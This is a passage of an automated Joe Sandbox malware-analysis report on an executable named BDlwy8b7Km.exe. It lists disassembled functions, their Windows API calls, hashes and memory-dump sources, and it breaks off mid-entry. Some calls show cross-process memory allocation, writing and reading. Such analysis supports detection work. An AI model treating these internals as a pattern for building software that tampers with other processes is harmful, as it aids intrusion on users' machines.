                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: 6316f1b5581585844bce2608ef09197c60b86e44e40c6bd77ae62d59407621c3
                                                  • Instruction ID: b4de012c36858a3a70b4c460db367c077f35f81073d08375de4f66138de9a350
                                                  • Opcode Fuzzy Hash: 6316f1b5581585844bce2608ef09197c60b86e44e40c6bd77ae62d59407621c3
                                                  • Instruction Fuzzy Hash: 42015B31C01A2DDBCF109FE4DD4E6EDBB79BB09711F000546E602B2261CB749655C7A1
                                                  Function 005F10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: 39550004226d5ee6bf0083071ea56fc8f9562f225486e9efababed910bf6c5ad
                                                  • Instruction ID: c6c2f77d6faa3971fbac6ccf78691fd8ba091febc60a7277a4274c9ebf6e2c3f
                                                  • Opcode Fuzzy Hash: 39550004226d5ee6bf0083071ea56fc8f9562f225486e9efababed910bf6c5ad
                                                  • Instruction Fuzzy Hash: 5A01F679600A09AFDB214BA5DC49E6A3F6EEF893A0B204419FA45D7260DB31DC11DAA0
                                                  Function 005F0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005F0FCA
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005F0FD6
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005F0FE5
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005F0FEC
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005F1002
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: bca7c4ae276b8a0b2f4b48f565afa45767f601921ecf9302ac86b33daf6aa341
                                                  • Instruction ID: eb2246d9ada81b7af75a8ba0d30f2c654f9544302e1170c7ccda978ae4f43ce9
                                                  • Opcode Fuzzy Hash: bca7c4ae276b8a0b2f4b48f565afa45767f601921ecf9302ac86b33daf6aa341
                                                  • Instruction Fuzzy Hash: 5EF04F36100B05EBD7214FA4DC4EF5A3F6EFF89761F104414FA45C7251DA75DC518A60
                                                  Function 005F1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005F102A
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005F1036
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1045
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005F104C
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1062
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: bbac6543deff5b3d1dfcb7957047bee655176f416d9a08f279a2fa9fe23e0e71
                                                  • Instruction ID: 6d71fb72c48835c06ebd8324713c3574640ae33dfad2707022e6044a21bdaf75
                                                  • Opcode Fuzzy Hash: bbac6543deff5b3d1dfcb7957047bee655176f416d9a08f279a2fa9fe23e0e71
                                                  • Instruction Fuzzy Hash: 5DF04935200B05EBDB215FA5EC4DF6A3FAEFF89761F200424FA45CB250CA75D8918A60
                                                  Function 0060030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600324
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600331
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 0060033E
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 0060034B
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600358
                                                  • CloseHandle.KERNEL32(?,?,?,?,0060017D,?,006032FC,?,00000001,005D2592,?), ref: 00600365
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: d20f33cc6c965ac6a760cda87d7e02df0b4524d3f18bb9b483fd3dfcfb329f0d
                                                  • Instruction ID: 499289aaac5cdc63e053bbd767c515b0f01e440051d144e914816ecf8ea13a16
                                                  • Opcode Fuzzy Hash: d20f33cc6c965ac6a760cda87d7e02df0b4524d3f18bb9b483fd3dfcfb329f0d
                                                  • Instruction Fuzzy Hash: 0601E272800B029FD7399F66D880543F7F6BF503153148A3FD19252A70C371A944CF80
                                                  Function 005CD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 005CD752
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005CD764
                                                  • _free.LIBCMT ref: 005CD776
                                                  • _free.LIBCMT ref: 005CD788
                                                  • _free.LIBCMT ref: 005CD79A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 4b06ec0940798af1400c18a96ee425a889aaf4c57e01fd03bd1672ed66657718
                                                  • Instruction ID: 45b9e0e7fedf2cf525635835545538ac84094f4198b3444abfe921b0f4e5c684
                                                  • Opcode Fuzzy Hash: 4b06ec0940798af1400c18a96ee425a889aaf4c57e01fd03bd1672ed66657718
                                                  • Instruction Fuzzy Hash: 22F0C972544305AFC621EBA4F9C9E167FEAFB44721F95181DF049E7501C634F8808674
                                                  Function 005F5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 005F5C58
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 005F5C6F
                                                  • MessageBeep.USER32(00000000), ref: 005F5C87
                                                  • KillTimer.USER32(?,0000040A), ref: 005F5CA3
                                                  • EndDialog.USER32(?,00000001), ref: 005F5CBD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 2b67fa70c6d89e519e19e4b53a38d9e75fec85f8ae27dbc303911068ced80b95
                                                  • Instruction ID: 1b0e1ec9d190b1762bb2d1a5f9d068d7ea4461bf9fa1c5691b688344c3b50830
                                                  • Opcode Fuzzy Hash: 2b67fa70c6d89e519e19e4b53a38d9e75fec85f8ae27dbc303911068ced80b95
                                                  • Instruction Fuzzy Hash: D2018630500F08ABEB305B14DD5EFBA7BB9BF00B05F001559A783A14E1EBF4AD898A90
                                                  Function 005C22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 005C22BE
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005C22D0
                                                  • _free.LIBCMT ref: 005C22E3
                                                  • _free.LIBCMT ref: 005C22F4
                                                  • _free.LIBCMT ref: 005C2305
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 88322c796865112167006c24cedbf2551a695331e5ddef3127c83ded5e565f04
                                                  • Instruction ID: 14517d736cc2e909d1418c15d770a6948e3708f9ebf4a42d03c039767eb5cecc
                                                  • Opcode Fuzzy Hash: 88322c796865112167006c24cedbf2551a695331e5ddef3127c83ded5e565f04
                                                  • Instruction Fuzzy Hash: FFF03A748402629FDB12AFA4BC05E093F6BB759761F04251EF818D72B1CBB00A91EFA4
                                                  Function 005A95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 005A95D4
                                                  • StrokeAndFillPath.GDI32(?,?,005E71F7,00000000,?,?,?), ref: 005A95F0
                                                  • SelectObject.GDI32(?,00000000), ref: 005A9603
                                                  • DeleteObject.GDI32 ref: 005A9616
                                                  • StrokePath.GDI32(?), ref: 005A9631
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 66d2db6fffbdd67fac61f29ec67d766eab863487fa938eb7b13d2a4a6b94fec8
                                                  • Instruction ID: 18685382fce011b7a2d7f91344880c162182a9aa6ca5075b735e140d1df194c8
                                                  • Opcode Fuzzy Hash: 66d2db6fffbdd67fac61f29ec67d766eab863487fa938eb7b13d2a4a6b94fec8
                                                  • Instruction Fuzzy Hash: 28F0C931405608EBEB265F66ED1D7683F66BB07332F08A314F4655A0F0C7B189A6DFA4
                                                  Function 005C0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: __freea$_free
                                                  • String ID: a/p$am/pm
                                                  • API String ID: 3432400110-3206640213
                                                  • Opcode ID: 81d1498de0e21d2a8345d9d8d2000750dcca600499f64a50a4179da04f32601b
                                                  • Instruction ID: 9bbd53b8a8b5dbc6fce543e05783c5237b759d50c8a2cbc304715ea83b5628b9
                                                  • Opcode Fuzzy Hash: 81d1498de0e21d2a8345d9d8d2000750dcca600499f64a50a4179da04f32601b
                                                  • Instruction Fuzzy Hash: D1D1E235900A46CFCB249FE8C849FBABFB1FB47B04F18495DE501AB642D2759D80CB99
                                                  Function 006161D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005B0242: EnterCriticalSection.KERNEL32(0066070C,00661884,?,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B024D
                                                    • Part of subcall function 005B0242: LeaveCriticalSection.KERNEL32(0066070C,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B028A
                                                    • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
                                                  • __Init_thread_footer.LIBCMT ref: 00616238
                                                    • Part of subcall function 005B01F8: EnterCriticalSection.KERNEL32(0066070C,?,?,005A8747,00662514), ref: 005B0202
                                                    • Part of subcall function 005B01F8: LeaveCriticalSection.KERNEL32(0066070C,?,005A8747,00662514), ref: 005B0235
                                                    • Part of subcall function 0060359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006035E4
                                                    • Part of subcall function 0060359C: LoadStringW.USER32(00662390,?,00000FFF,?), ref: 0060360A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                  • String ID: x#f$x#f$x#f
                                                  • API String ID: 1072379062-4266588095
                                                  • Opcode ID: 87284c3fa0a506f0713a1f160fd6a56546818f3763ad99507d822049ddb3cbaf
                                                  • Instruction ID: ae3085202f16c0dd20b5d9390d4c3ceaf883993772a527096193d4fb1b9a71fe
                                                  • Opcode Fuzzy Hash: 87284c3fa0a506f0713a1f160fd6a56546818f3763ad99507d822049ddb3cbaf
                                                  • Instruction Fuzzy Hash: 3BC14C75A00106ABCB14DF58C895EFEBBBAFF48300F148069F9559B291DB70ED85CB90
                                                  Function 005C8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 005C8B6E
                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 005C8B7A
                                                  • __dosmaperr.LIBCMT ref: 005C8B81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                  • String ID: .[
                                                  • API String ID: 2434981716-1428149938
                                                  • Opcode ID: 8ad66da75a239b43527828c35aed731b9dae510411922c7c42580d0b43b3478e
                                                  • Instruction ID: e6c0c90580bffbf295bf75b758bd5b24b38b8084e7a402b573483d1a21fef23e
                                                  • Opcode Fuzzy Hash: 8ad66da75a239b43527828c35aed731b9dae510411922c7c42580d0b43b3478e
                                                  • Instruction Fuzzy Hash: 7C416AB0604145AFDB249FA4CC85FBD7FA6FB85318F2885AEF88587242DE719C129790
                                                  Function 005F2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005FB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F21D0,?,?,00000034,00000800,?,00000034), ref: 005FB42D
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005F2760
                                                    • Part of subcall function 005FB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 005FB3F8
                                                    • Part of subcall function 005FB32A: GetWindowThreadProcessId.USER32(?,?), ref: 005FB355
                                                    • Part of subcall function 005FB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005F2194,00000034,?,?,00001004,00000000,00000000), ref: 005FB365
                                                    • Part of subcall function 005FB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005F2194,00000034,?,?,00001004,00000000,00000000), ref: 005FB37B
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F27CD
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F281A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 3b5a5c429eeb7deaaab58a9fbd46fcce99350d8ad24ecdc6c92af73cf6f464cc
                                                  • Instruction ID: 741427b9915dc354f732b1b1ada207ea96beb1817acfc9d75c70649baa73f44a
                                                  • Opcode Fuzzy Hash: 3b5a5c429eeb7deaaab58a9fbd46fcce99350d8ad24ecdc6c92af73cf6f464cc
                                                  • Instruction Fuzzy Hash: 60413B7290021DAFDB10DBA4CD46AEEBBB8FF49310F108099FA55B7181DB746E45CBA1
                                                  Function 005C172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BDlwy8b7Km.exe,00000104), ref: 005C1769
                                                  • _free.LIBCMT ref: 005C1834
                                                  • _free.LIBCMT ref: 005C183E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
